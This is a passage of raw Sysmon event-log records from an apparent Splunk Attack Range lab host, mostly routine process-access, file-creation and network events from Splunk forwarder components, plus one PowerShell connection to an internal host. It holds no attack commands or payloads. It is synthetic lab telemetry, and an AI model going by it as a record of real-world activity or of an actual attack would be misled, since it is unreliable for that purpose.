Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0ED210302AB26AF0CD4AB91C4441F75,SHA256=E7B4743D066E80CCF66E7F0A9449E2A6D2926412157B898815B908B2FA031EBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:39.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=193B382D1751E7DDDF4D503CCC7A57CD,SHA256=6396E338BB1BA3BE615FE29CDA3341B4EC4205DF0E77DE3DD0C6298B64110F79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:39.463{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAD7697D8D3CF97F0115E68696C574E4,SHA256=33C15F3442DD8EAB3AA28798ECCA689C279AAB801F109EADD5BA82285DC41AEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.861{B81B27B7-81EC-613A-9E96-03000000C801}20561032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81EC-613A-9E96-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-81EC-613A-9E96-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.708{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81EC-613A-9E96-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.693{B81B27B7-81EC-613A-9E96-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:05.317{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61978-false10.0.1.12-8000- 354300x800000000000000035127048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:04.738{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61977-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:40.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30FE9E05311DE288B349244960E581BB,SHA256=109301A550A010DBB3A2D938D3794F9BCB1AED3F0DDBAA177039834459D47063,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.843{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C049035D4EECB8EC1F447EBC71FBEDD6,SHA256=19481E975BFAAB9CC03CA316C1EA361CD5C2DAC3775A60C33ABC026FF509F205,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.842{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82F9571A1FC044F599CED6A016E39DB6,SHA256=B68668A4132EEAE655581C3A9C25E1CA169E7B561444160152C639F8DB15EE4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.543{B81B27B7-81ED-613A-9F96-03000000C801}70964468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=509B81E64F4762EFDC4325C0AB5C3B5E,SHA256=14C6015DEDB9CDE761871E45EF0193742F306E3E8BD51E3382F0D1E8692B4A96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81ED-613A-9F96-03000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-81ED-613A-9F96-03000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.392{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81ED-613A-9F96-03000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:41.378{B81B27B7-81ED-613A-9F96-03000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.494{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=176102B513C6B9216597A62B24820EC7,SHA256=C8B53130A190043A2968F3CE0F4E2243B0AE53F565AFEB717A201A8A90522280,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81EE-613A-A096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-81EE-613A-A096-03000000C801}1040C:\Program 